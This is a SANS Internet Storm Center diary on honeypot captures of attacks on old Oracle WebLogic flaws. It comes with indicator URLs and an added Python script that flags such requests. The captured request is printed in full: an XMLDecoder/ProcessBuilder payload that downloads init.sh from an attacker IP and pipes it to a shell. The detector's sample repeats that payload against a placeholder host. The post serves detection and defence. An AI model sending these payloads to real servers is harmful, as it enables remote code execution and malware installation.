[SANS ISC] Scanning for Previous Oracle WebLogic Vulnerabilities, (Sat, Oct 9th)

In the past few weeks, I have captured multiple instances of traffic related to some past Oracle vulnerabilities that have already been patched. The first is related to an RCE (CVE-2017-10271) that can be triggered to execute commands remotely by bypassing the limitations of the CVE-2017-3506 patch. The POST contains an init.sh script which doesn’t appear to be available for download.

The second example is a vulnerability in the Oracle WebLogic Server component related to a Deserialization Vulnerability (CVE-2019-2725).

Traffic Examples

20210929-120748: 192.168.25.9:7001-47.106.191.51:36562 data
POST /wls-wsat/CoordinatorPortType11 HTTP/1.1
Host: XX.XX.42.114:7001
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)
Content-Length: 611
Connection: close
Content-Type: text/xml
Accept-Encoding: gzip
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"><soapenv:Header><work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"><java version="1.8.0_131" class="java.beans.XMLDecoder"><void class="java.lang.ProcessBuilder"><array class="java.lang.String" length="3"><void index="0"><string>/bin/bash</string></void><void index="1"><string>-c</string></void><void index="2"><string>cur -fsSL http://45.9.148.37/E5DB0E07C3D7BE80V201007/init.sh |sh</string> </void> </array> <void method="start"/></void></java></work:WorkContext></soapenv:Header><soapenv:Body/></soapenv:Envelope>

20211007-185800: 192.168.25.9:7001-185.128.41.50:39004 data
POST /_async/AsyncResponseService HTTP/1.1
SOAPAction:
Content-type: text/xml
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36
Connection: close
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.5
Content-Length: 1028
Cache-Control: no-cache
Pragma: no-cache
Host: XX.XX.42.114:7001

Indicators -> /wls-wsat/

45.9.148.37/E5DB0E07C3D7BE80V201007/init.sh
45.9.148.37/cf67356a3333e6999999999/init.sh
185.181.10.234/E5DB0E07C3D7BE80V520/init.sh
helpdeskserver.epelcdn.com/dd210131/init.sh
startbinmanager.epelcdn.com/dd09162/init.sh
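The captures above share a small set of traits a defender can key on: a POST to /wls-wsat/ or /_async/, a SOAP WorkContext header carrying a java.beans.XMLDecoder / ProcessBuilder gadget, and a command string that downloads and pipes a script to sh. The following is an added example (not the diary's or SANS's own tooling) that applies those checks to raw HTTP requests and pulls download URLs out of the payload for an indicator list; the sample requests are constructed, and the download host 203.0.113.5 is a placeholder rather than an indicator from the diary.

```python
"""Triage captured HTTP requests for WebLogic WLS-WSAT / _async probes.

Added example, not part of the original diary. It flags POSTs to the
endpoints seen in the captures, looks for the XMLDecoder / ProcessBuilder
gadget in the SOAP WorkContext header, and extracts download URLs from the
command string. All sample requests below are constructed.
"""
import re

# Endpoints abused by CVE-2017-10271 (wls-wsat) and CVE-2019-2725 (_async).
WEBLOGIC_PATHS = ("/wls-wsat/", "/_async/")

# Markers that only appear when a WorkContext header carries an XMLDecoder gadget.
GADGET_MARKERS = ("java.beans.XMLDecoder", "java.lang.ProcessBuilder")

URL_RE = re.compile(r"https?://[^\s\"'<>|]+")
XMLNS_RE = re.compile(r'xmlns(?::\w+)?="([^"]+)"')
PIPE_TO_SHELL_RE = re.compile(r"\|\s*(?:ba)?sh\b")


def parse_request(raw):
    """Split a raw HTTP request into (method, path, headers, body)."""
    raw = raw.replace("\r\n", "\n")
    head, _, body = raw.partition("\n\n")
    lines = head.split("\n")
    method, path, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, sep, value = line.partition(":")
        if sep:  # tolerate empty values such as "SOAPAction:"
            headers[name.strip().lower()] = value.strip()
    return method, path, headers, body


def extract_urls(body):
    """Return URLs from the payload, ignoring XML namespace URIs (not indicators)."""
    namespaces = set(XMLNS_RE.findall(body))
    return sorted(u for u in set(URL_RE.findall(body)) if u not in namespaces)


def classify(raw):
    """Return a triage verdict for one raw request."""
    method, path, headers, body = parse_request(raw)
    reasons = []
    if any(path.startswith(p) for p in WEBLOGIC_PATHS):
        reasons.append("weblogic-deserialization-endpoint")
    if method == "POST" and any(m in body for m in GADGET_MARKERS):
        reasons.append("xmldecoder-gadget")
    urls = extract_urls(body)
    if urls and PIPE_TO_SHELL_RE.search(body):
        reasons.append("download-and-execute")
    return {"method": method, "path": path, "suspicious": bool(reasons),
            "reasons": reasons, "urls": urls}


def triage(requests):
    """Classify a mapping of label -> raw request and keep the suspicious ones."""
    verdicts = {label: classify(raw) for label, raw in requests.items()}
    return {label: v for label, v in verdicts.items() if v["suspicious"]}


# Constructed samples; 192.0.2.10 is the probed host, 203.0.113.5 a placeholder payload host.
SAMPLE_REQUESTS = {
    "wsat_probe": (
        "POST /wls-wsat/CoordinatorPortType11 HTTP/1.1\n"
        "Host: 192.0.2.10:7001\n"
        "Content-Type: text/xml\n"
        "Connection: close\n"
        "\n"
        '<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">'
        '<soapenv:Header><work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">'
        '<java version="1.8.0_131" class="java.beans.XMLDecoder">'
        '<void class="java.lang.ProcessBuilder"><array class="java.lang.String" length="3">'
        '<void index="0"><string>/bin/bash</string></void>'
        '<void index="1"><string>-c</string></void>'
        '<void index="2"><string>curl -fsSL http://203.0.113.5/PLACEHOLDER/init.sh |sh</string></void>'
        '</array><void method="start"/></void></java></work:WorkContext></soapenv:Header>'
        "<soapenv:Body/></soapenv:Envelope>"
    ),
    "async_probe": (
        "POST /_async/AsyncResponseService HTTP/1.1\n"
        "SOAPAction:\n"
        "Content-type: text/xml\n"
        "Host: 192.0.2.10:7001\n"
        "\n"
        '<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">'
        '<soapenv:Header><work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">'
        '<java class="java.beans.XMLDecoder"></java>'
        "</work:WorkContext></soapenv:Header><soapenv:Body/></soapenv:Envelope>"
    ),
    "benign": (
        "GET /console/login/LoginForm.jsp HTTP/1.1\n"
        "Host: 192.0.2.10:7001\n"
        "User-Agent: Mozilla/5.0\n"
        "\n"
    ),
}

if __name__ == "__main__":
    for label, verdict in triage(SAMPLE_REQUESTS).items():
        print(label, verdict["path"], verdict["reasons"], verdict["urls"])
```

The namespace filter matters in practice: a naive URL regex over a SOAP body returns the xmlns URIs first, which would pollute an indicator list with schemas.xmlsoap.org and bea.com. Path matching alone is kept as a (weaker) reason because reconnaissance often hits /wls-wsat/ with an empty or malformed body before any gadget is sent.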

[1] https://github.com/s0wr0b1ndef/Oracle-WebLogic-WLS-WSAT
[2] https://www.acunetix.com/vulnerabilities/web/oracle-weblogic-wls-wsat-component-deserialization-rce/
[3] https://nvd.nist.gov/vuln/detail/CVE-2017-3506
[4] https://nvd.nist.gov/vuln/detail/CVE-2017-10271
[5] https://nvd.nist.gov/vuln/detail/CVE-2019-2725
[6] https://nvd.nist.gov/vuln/detail/CVE-2019-2729
[7] https://isc.sans.edu/forums/diary/Update+about+Weblogic+CVE20192725+Exploits+Used+in+the+Wild+Patch+Status/24890
[8] https://isc.sans.edu/forums/diary/Unpatched+Vulnerability+Alert+WebLogic+Zero+Day/24880/
[9] https://isc.sans.edu/forums/diary/Cryptojacking+Targeting+WebLogic+TCP7001/26768

———–
Guy Bruneau IPSS Inc.
My Handler Page
Twitter: GuyBruneau
gbruneau at isc dot sans dot edu

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
